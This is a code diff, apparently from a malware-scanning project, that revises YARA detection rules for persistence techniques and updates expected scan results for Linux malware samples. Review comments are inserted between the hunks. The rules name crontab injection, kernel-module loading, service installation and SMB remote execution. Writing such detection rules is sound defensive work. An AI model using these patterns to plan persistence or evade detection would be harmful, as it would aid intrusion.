+ $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+
+ condition:
+ $crontab and any of ($c_*)
+}
+
+rule echo_crontab: high {
+ meta:
+ hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de"
+ hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
+ hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
+
+ strings:
+ $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/
+
+ condition:
+ $echo
+}
diff --git a/rules/persist/kernel_module/module-load.yara b/rules/persist/kernel_module/insert.yara
similarity index 82%
rename from rules/persist/kernel_module/module-load.yara
rename to rules/persist/kernel_module/insert.yara
index 7f64e2059..05254583e 100644
--- a/rules/persist/kernel_module/module-load.yara
+++ b/rules/persist/kernel_module/insert.yara
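Review bot: echo_crontab is moved into tab.yara without a `description` meta, unlike hidden_crontab directly above it and the other rules in this file, so its finding will show only the rule name; suggest `description = "writes a crontab entry via echo"`. Its condition is also the bare `$echo` with no filesize bound, whereas crontab_danger_path just above caps at 100MB, so a bound such as `filesize < 100MB and $echo` would keep the file consistent.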
@@ -1,29 +1,23 @@
-rule init_module: medium linux {
+rule kernel_module_loader: high linux {
 meta:
- description = "Linux kernel module"
- syscall = "init_module"
- capability = "CAP_SYS_MODULE"
- hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
- hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410"
- hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
- filetypes = "ko,elf,so"
+ description = "loads Linux kernel module via insload"
+ hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
 strings:
- $ref = "init_module" fullword
+ $insmod = /insmod [ \$\%\w\.\/_-]{1,32}/
 condition:
- filesize < 1MB and all of them
+ filesize < 10MB and all of them
 }
-rule kernel_module_loader: high linux {
+rule kernel_module_loader_sus: high linux {
 meta:
- description = "loads Linux kernel module via insload"
- hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
- hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
- hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ description = "suspiciously loads Linux kernel module via insload"
 strings:
- $insmod = /insmod [ \$\%\w\.\/_-]{1,32}\.ko/
+ $insmod = /insmod [ \$\%\w\.\/_-]{1,32} .{0,16}\/dev\/null 2\>\&1/
 condition:
 filesize < 10MB and all of them
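Review bot: Both new-side descriptions in this hunk say `via insload`, which looks like a typo for `insmod`, the tool the regexes actually match; suggest `description = "loads Linux kernel module via insmod"` and `description = "suspiciously loads Linux kernel module via insmod"`. kernel_module_loader is now `high` while its regex no longer requires a `.ko` suffix, so an ordinary init script with `insmod $MODULE` scores the same as the `_sus` variant that demands output redirected to /dev/null; with both at the same severity the corroborating rule adds nothing, so the plain one probably wants `medium`. The `_sus` rule's closing brace is outside this hunk.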
@@ -41,3 +35,21 @@ rule cha_cha_tests: override linux {
 condition:
 filesize < 2KB and any of them
 }
+
+rule init_module: medium linux {
+ meta:
+ description = "Linux kernel module"
+ syscall = "init_module"
+ capability = "CAP_SYS_MODULE"
+ hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
+ hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ filetypes = "ko,elf,so"
+
+ strings:
+ $ref = "init_module" fullword
+
+ condition:
+ filesize < 1MB and all of them
+}
+
diff --git a/rules/persist/kernel_module/module.yara b/rules/persist/kernel_module/module.yara
index a0833f10c..028c50111 100644
--- a/rules/persist/kernel_module/module.yara
+++ b/rules/persist/kernel_module/module.yara
@@ -1,6 +1,8 @@
+import "elf"
+
 rule lkm: medium {
 meta:
- description = "Contains a Linux kernel module"
+ description = "Linux kernel module"
 capability = "CAP_SYS_MODULE"
 hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
 hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
@@ -14,6 +16,22 @@ rule lkm: medium {
 all of them
 }
+rule lkm_embedded_in_elf: high {
+ meta:
+ description = "Contains embedded Linux kernel module"
+ capability = "CAP_SYS_MODULE"
+ hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ hash_2023_LQvKibDTq4_diamorphine_mod = "e394d87045c800a63bd4d295e635ff8a03624255c3fd85fe8e6957807f1cb569"
+
+ strings:
+ $vergmagic = "vermagic="
+ $srcversion = "srcversion="
+
+ condition:
+ elf.type == elf.ET_EXEC and all of them
+}
+
 rule delete_module: medium {
 meta:
 description = "Unload Linux kernel module"
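Review bot: In lkm_embedded_in_elf the identifier `$vergmagic` is a typo for `$vermagic` (it matches `vermagic=`). The condition `elf.type == elf.ET_EXEC and all of them` excludes position-independent executables, which are ET_DYN and the default output of most current toolchains, so an embedded module in a PIE loader is missed entirely; suggest `(elf.type == elf.ET_EXEC or elf.type == elf.ET_DYN) and all of them` together with a filesize bound, or a meta note explaining why ET_EXEC alone is wanted.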
diff --git a/rules/persist/kernel_module/symbol-lookup.yara b/rules/persist/kernel_module/symbol-lookup.yara
index bfdbd8034..f135f28a2 100644
--- a/rules/persist/kernel_module/symbol-lookup.yara
+++ b/rules/persist/kernel_module/symbol-lookup.yara
@@ -40,3 +40,18 @@ rule bpftrace: override linux {
 condition:
 filesize < 2MB and any of them
 }
+
+rule bpf: override linux {
+ meta:
+ description = "libbpf"
+ filetypes = "so,elf"
+ kallsyms_lookup = "medium"
+ proc_d_exe_high = "medium"
+
+ strings:
+ $ref = "BPF" fullword
+ $ref2 = "LIBBPF" fullword
+
+ condition:
+ filesize < 2MB and any of them
+}
diff --git a/rules/persist/service/install.yara b/rules/persist/service/install.yara
new file mode 100644
index 000000000..cc7c79dca
--- /dev/null
+++ b/rules/persist/service/install.yara
@@ -0,0 +1,27 @@
+rule register_service_start: windows medium {
+ meta:
+ description = "installs and starts a Windows Service"
+
+ strings:
+ $s_install = "RegisterServiceCtrlHandlerA"
+ $s_create = "CreateServiceA"
+ $s_start = "StartServiceA"
+
+ condition:
+ filesize < 5MB and all of them
+}
+
+rule register_service_start_high: windows high {
+ meta:
+ description = "installs and starts a Windows Service"
+
+ strings:
+ $s_install = "RegisterServiceCtrlHandlerA"
+ $s_create = "CreateServiceA"
+ $s_start = "StartServiceA"
+ $o_netsh = "netsh"
+ $o_filter = "SetUnhandledExceptionFilter"
+
+ condition:
+ filesize < 200KB and all of ($s*) and any of ($o*)
+}
diff --git a/rules/persist/sysv/sysv.yara b/rules/persist/sysv/sysv.yara
new file mode 100644
index 000000000..aac9e05dc
--- /dev/null
+++ b/rules/persist/sysv/sysv.yara
@@ -0,0 +1,11 @@
+rule sysv_persist: high {
+ meta:
+ description = "installs arbitrary files into SYSV-style init directories"
+
+ strings:
+ $rc_d = "/etc/rc%d.d/S%d%s"
+ $init_d = "/etc/init.d/%s"
+
+ condition:
+ filesize < 5MB and any of them
+}
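Review bot: The bpf override downgrades kallsyms_lookup and proc_d_exe_high for any ELF under 2MB containing the fullword `BPF`, and eBPF-based loaders and rootkits carry that string as a matter of course, so the override neutralises those rules on precisely the class they exist for; suggest keying on the libbpf-specific string only, `filesize < 2MB and $ref2`, or on a libbpf symbol name. In install.yara on this line the tags read `windows medium` / `windows high` while every other rule in this change puts the severity first (`high windows`, `high linux`); if the loader reads severity positionally this is a silent misclassification, so suggest `rule register_service_start: medium windows {`. The `A`-suffixed API names also leave the wide `CreateServiceW`/`StartServiceW` variants uncovered.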
diff --git a/rules/process/thread_local_storage.yara b/rules/process/thread_local_storage.yara
deleted file mode 100644
index 493a44223..000000000
--- a/rules/process/thread_local_storage.yara
+++ /dev/null
@@ -1,11 +0,0 @@
-rule tls_get_addr {
- meta:
- description = "Uses glibc thread local storage"
- ref = "https://chao-tic.github.io/blog/2018/12/25/tls"
-
- strings:
- $val = "__tls_get_addr" fullword
-
- condition:
- any of them
-}
diff --git a/rules/sec-tool/pentest/smbexec.yara b/rules/sec-tool/pentest/smbexec.yara
new file mode 100644
index 000000000..94a829082
--- /dev/null
+++ b/rules/sec-tool/pentest/smbexec.yara
@@ -0,0 +1,11 @@
+rule hacktool_smbexec: critical {
+ meta:
+ description = "execute commands on remote SMB host"
+
+ strings:
+ $hash = "user supplied NTLM HASH"
+ $hash2 = "HASH PASS: Substituting"
+
+ condition:
+ filesize < 100KB and any of them
+}
diff --git a/rules/sus/geopolitics.yara b/rules/sus/geopolitics.yara
new file mode 100644
index 000000000..21f2a354d
--- /dev/null
+++ b/rules/sus/geopolitics.yara
@@ -0,0 +1,10 @@
+rule ukraine: medium {
+ meta:
+ description = "Glory to Ukraine!"
+
+ strings:
+ $ref = "слава Украине!"
+
+ condition:
+ any of them
+}
diff --git a/rules/sus/malicious.yara b/rules/sus/malicious.yara
index 9c4540d06..080e8333b 100644
--- a/rules/sus/malicious.yara
+++ b/rules/sus/malicious.yara
@@ -5,8 +5,10 @@ rule malicious: medium {
 strings:
 $ref = /[a-zA-Z\-_ ]{0,16}malicious[a-zA-Z\-_ ]{0,16}/ fullword
+ $not_sshd = "attempt by a malicious server"
+
 condition:
- any of them
+ $ref and none of ($not*)
 }
 rule malici0us: high {
diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple
index af4355d54..605a4d85a 100644
--- a/tests/does-nothing/does-nothing.simple
+++ b/tests/does-nothing/does-nothing.simple
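Review bot: The ukraine rule's `description = "Glory to Ukraine!"` repeats the matched slogan rather than stating what the finding means, so a report reader gets no explanation; something like `description = "contains a Ukrainian-language political slogan"` would. `nocase` does not apply to the non-ASCII bytes of `$ref`, so a capitalised `Слава` or the Ukrainian-spelled form is not matched — either add those as further strings or note the limitation in the meta. The rule also has no filesize bound, unlike the sibling hacktool_smbexec on this line.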
@@ -1,8 +1,8 @@
 # does-nothing/does-nothing: medium
 data/encoding/base64: low
 data/encoding/json: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 exec/plugin: low
 exec/program: medium
diff --git a/tests/javascript/2022.an-instance.99.10.9/index.js.simple b/tests/javascript/2022.an-instance.99.10.9/index.js.simple
index 3f22ff99b..75c6f215c 100644
--- a/tests/javascript/2022.an-instance.99.10.9/index.js.simple
+++ b/tests/javascript/2022.an-instance.99.10.9/index.js.simple
@@ -2,7 +2,7 @@
 anti-static/obfuscation/hex: medium
 data/encoding/json_encode: low
 discover/network/interface_list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/user/info: medium
 exfil/nodejs: critical
 fs/directory/list: low
diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple
index 0e5568b9b..68bb087d0 100644
--- a/tests/javascript/clean/203.b7219352.chunk.js.simple
+++ b/tests/javascript/clean/203.b7219352.chunk.js.simple
@@ -8,6 +8,7 @@ data/encoding/json_encode: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
index c7776083d..0be4faad4 100644
--- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
+++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
@@ -2,7 +2,6 @@
 3P/threat_hunting/powershell: medium
 c2/addr/ip: medium
 c2/addr/server: medium
-c2/server_address: medium
 collect/archives/unarchive: medium
 collect/databases/mysql: medium
 collect/databases/postgresql: medium
@@ -21,13 +20,15 @@ data/encoding/json_encode: low
 data/encoding/reverse: low
 data/random/insecure: low
 discover/group/lookup: medium
+discover/process/egid: medium
+discover/process/parent: low
 discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/cmd: medium
 exec/conditional/LANG: low
@@ -91,9 +92,7 @@ persist/daemon: medium
 process/chdir: low
 process/chroot: low
 process/create: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
index 855e2c16f..be7062b83 100644
--- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
+++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
@@ -2,7 +2,7 @@
 3P/threat_hunting/powershell: medium
 anti-static/obfuscation/js: medium
 c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
 collect/archives/unarchive: medium
 collect/databases/mysql: medium
 collect/databases/postgresql: medium
@@ -22,13 +22,15 @@ data/encoding/reverse: low
 data/hash/md5: low
 data/random/insecure: low
 discover/group/lookup: medium
+discover/process/egid: medium
+discover/process/parent: low
 discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/cmd: medium
 exec/plugin: low
@@ -91,9 +93,7 @@ persist/daemon: medium
 process/chdir: low
 process/chroot: low
 process/create: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/javascript/clean/bash.js.simple b/tests/javascript/clean/bash.js.simple
index 13532d334..dbfc0600a 100644
--- a/tests/javascript/clean/bash.js.simple
+++ b/tests/javascript/clean/bash.js.simple
@@ -1,9 +1,10 @@
 # javascript/clean/bash.js: medium
 data/compression/bzip2: low
 data/compression/gzip: low
+discover/multiple: medium
 discover/network/interface_list: medium
 discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
diff --git a/tests/javascript/clean/faker.js.simple b/tests/javascript/clean/faker.js.simple
index bb8797a29..8bd713980 100644
--- a/tests/javascript/clean/faker.js.simple
+++ b/tests/javascript/clean/faker.js.simple
@@ -14,7 +14,6 @@ data/embedded/base64_url: medium
 data/encoding/base64: low
 data/encoding/json_decode: low
 data/encoding/json_encode: low
-evasion/hidden_paths/x11: low
 exec/plugin: low
 exfil/office_file_ext: medium
 exfil/stealer/credit_card: medium
diff --git a/tests/javascript/clean/faker.min.js.simple b/tests/javascript/clean/faker.min.js.simple
index 87efb6b7e..5baafcaa1 100644
--- a/tests/javascript/clean/faker.min.js.simple
+++ b/tests/javascript/clean/faker.min.js.simple
@@ -9,7 +9,6 @@ data/compression/bzip2: low
 data/compression/gzip: low
 data/encoding/json_decode: low
 data/encoding/json_encode: low
-evasion/hidden_paths/x11: low
 exec/plugin: low
 exfil/office_file_ext: medium
 exfil/stealer/credit_card: medium
diff --git a/tests/javascript/clean/highlight.esm.js.simple b/tests/javascript/clean/highlight.esm.js.simple
index 698fc579b..ad9968262 100644
--- a/tests/javascript/clean/highlight.esm.js.simple
+++ b/tests/javascript/clean/highlight.esm.js.simple
@@ -20,10 +20,10 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/relative_hidden: low
 exec/cmd: medium
 exec/plugin: low
 exec/program/background: low
+exec/program/hidden: medium
 exec/remote_commands/code_eval: medium
 exec/script/osa: medium
 exec/shell/SHELL: low
diff --git a/tests/javascript/clean/highlight.js.simple b/tests/javascript/clean/highlight.js.simple
index f2585167d..1d6cc7135 100644
--- a/tests/javascript/clean/highlight.js.simple
+++ b/tests/javascript/clean/highlight.js.simple
@@ -20,10 +20,10 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/relative_hidden: low
 exec/cmd: medium
 exec/plugin: low
 exec/program/background: low
+exec/program/hidden: medium
 exec/remote_commands/code_eval: medium
 exec/script/osa: medium
 exec/shell/SHELL: low
diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple
index f70f60b70..98840f39b 100644
--- a/tests/javascript/clean/mode-php.js.simple
+++ b/tests/javascript/clean/mode-php.js.simple
@@ -11,11 +11,13 @@ data/encoding/base64: low
 data/encoding/reverse: low
 data/hash/md5: low
 data/random/insecure: low
-discover/system/hostname_get: low
+discover/process/egid: medium
+discover/process/parent: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/plugin: low
 exec/program: medium
@@ -57,7 +59,5 @@ net/url/embedded: low
 net/url/encode: medium
 persist/daemon: medium
 process/chroot: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple
index 020791f13..a5f1f66b8 100644
--- a/tests/javascript/clean/mode-php_laravel_blade.js.simple
+++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple
@@ -11,11 +11,13 @@ data/encoding/base64: low
 data/encoding/reverse: low
 data/hash/md5: low
 data/random/insecure: low
-discover/system/hostname_get: low
+discover/process/egid: medium
+discover/process/parent: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/plugin: low
 exec/program: medium
@@ -57,7 +59,5 @@ net/url/embedded: low
 net/url/encode: medium
 persist/daemon: medium
 process/chroot: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple
index 8a12e2499..57a0b5396 100644
--- a/tests/javascript/clean/php.js.simple
+++ b/tests/javascript/clean/php.js.simple
@@ -9,11 +9,13 @@ data/compression/gzip: low
 data/encoding/base64: low
 data/encoding/reverse: low
 data/random/insecure: low
-discover/system/hostname_get: low
+discover/process/egid: medium
+discover/process/parent: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/plugin: low
 exec/program: medium
@@ -53,7 +55,5 @@ net/socket/send: low
 net/url/embedded: low
 net/url/encode: medium
 process/chroot: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/javascript/clean/prism-bash.js.simple b/tests/javascript/clean/prism-bash.js.simple
index 4a9c7f0a8..22517e6cc 100644
--- a/tests/javascript/clean/prism-bash.js.simple
+++ b/tests/javascript/clean/prism-bash.js.simple
@@ -1,9 +1,10 @@
 # javascript/clean/prism-bash.js: medium
 data/compression/bzip2: low
 data/compression/gzip: low
+discover/multiple: medium
 discover/network/interface_list: medium
 discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
diff --git a/tests/javascript/clean/prism-bash.min.js.simple b/tests/javascript/clean/prism-bash.min.js.simple
index b20adfcd2..7849e6737 100644
--- a/tests/javascript/clean/prism-bash.min.js.simple
+++ b/tests/javascript/clean/prism-bash.min.js.simple
@@ -1,9 +1,10 @@
 # javascript/clean/prism-bash.min.js: medium
 data/compression/bzip2: low
 data/compression/gzip: low
+discover/multiple: medium
 discover/network/interface_list: medium
 discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
diff --git a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple
index 3c0d0badc..724f70e98 100644
--- a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple
+++ b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple
@@ -4,9 +4,10 @@ data/compression/bzip2: low
 data/compression/gzip: low
 data/encoding/json_decode: low
 data/encoding/json_encode: low
+discover/multiple: medium
 discover/network/interface_list: medium
 discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple
index 852001aa1..78b178759 100644
--- a/tests/linux/2021.FontOnLake/45E9.elf.simple
+++ b/tests/linux/2021.FontOnLake/45E9.elf.simple
@@ -11,17 +11,20 @@ crypto/aes: low
 data/encoding/base64: low
 data/hash/md5: low
 discover/group/lookup: medium
-discover/system/hostname_get: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/pam: medium
 evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/proc: high
-evasion/hidden_paths/x11: low
+evasion/file/location/x11_unix: low
+evasion/file/prefix: medium
+evasion/file/prefix/proc: high
 evasion/logging/acct: low
+evasion/logging/dmesg: critical
 evasion/logging/failed_logins: medium
 evasion/logging/historical_logins: medium
+evasion/rootkit/refs: high
 exec/program: medium
 exec/program/background: low
 exec/shell/SHELL: low
@@ -57,11 +60,10 @@ fs/symlink_resolve: low
 fs/tempdir/create: low
 fs/tempdir/tempfile_create: low
 impact/remote_access/agent: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
 impact/remote_access/reverse_shell: medium
 impact/remote_access/ssh: high
 impact/rootkit: critical
-impact/rootkit/refs: high
 impact/ui/x11_auth: medium
 malware/family/fontonlake: critical
 net/download: medium
@@ -80,9 +82,9 @@ net/tcp/ssh: medium
 net/tun_tap: medium
 net/url/embedded: low
 persist/daemon: medium
+persist/kernel_module/insert: high
 persist/kernel_module/kprobe: medium
 persist/kernel_module/module: medium
-persist/kernel_module/module_load: medium
 persist/kernel_module/symbol_lookup: high
 persist/pid_file: medium
 process/chroot: low
@@ -93,4 +95,3 @@ process/name_set: medium
 process/userid_set: low
 process/username_set: medium
 sus/ancient_gcc: medium
-sus/malicious: medium
diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
index 65d91e761..d33af9524 100644
--- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
+++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
@@ -14,12 +14,13 @@ data/encoding/base64: low
 data/hash/blake2b: low
 data/hash/sha1: low
 data/random/insecure: low
-discover/network/interface_get: low
-discover/system/cpu_info: low
+discover/network/interface: low
+discover/process/runtime_deps: medium
+discover/system/cpu: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
 exec/conditional/LANG: low
 exec/dylib/address_check: low
 exec/dylib/iterate: low
@@ -86,4 +87,3 @@ privesc/sudo: medium
 process/create: low
 process/multithreaded: low
 process/name_set: medium
-process/thread_local_storage: low
diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple
index 831775516..0184dfa7d 100644
--- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple
+++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple
@@ -6,7 +6,7 @@ credential/keylogger: medium
 credential/password: low
 discover/network/interface_list: medium
 discover/system/platform: low
-evasion/hijack_execution/process_hide: critical
+evasion/rootkit/userspace: critical
 exec/dylib/symbol_address: medium
 exfil/stealer/pam: high
 fs/link_read: low
diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
index 5905cae77..435fce245 100644
--- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
+++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
@@ -1,9 +1,7 @@
 ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
-| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
-| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | |
-| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
-| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
+| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
+| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
diff --git a/tests/linux/2022.bpfdoor/bpfdoor_2.simple b/tests/linux/2022.bpfdoor/bpfdoor_2.simple
index 9ca216b9d..0c0f91b34 100644
--- a/tests/linux/2022.bpfdoor/bpfdoor_2.simple
+++ b/tests/linux/2022.bpfdoor/bpfdoor_2.simple
@@ -1,7 +1,6 @@
 # linux/2022.bpfdoor/bpfdoor_2: critical
 3P/elastic/bpfdoor: critical
 credential/sniffer/pcap: high
-evasion/hidden_paths/x11: low
 evasion/logging/hide_shell_history: high
 exec/program: medium
 exec/program/background: low
diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple
index 944a8619e..c1c01e83a 100644
--- a/tests/linux/2022.ez-pwnkit/payload.simple
+++ b/tests/linux/2022.ez-pwnkit/payload.simple
@@ -1,7 +1,7 @@
 # linux/2022.ez-pwnkit/payload: critical
 c2/addr/ip: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 exec/plugin: low
 exec/program: medium
diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md
index 65dc88375..082d8ea1a 100644
--- a/tests/linux/2023.ConnectBack/tiny.md
+++ b/tests/linux/2023.ConnectBack/tiny.md
@@ -1,9 +1,7 @@
 ## linux/2023.ConnectBack/tiny [😈 CRITICAL]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
-| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
-| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | |
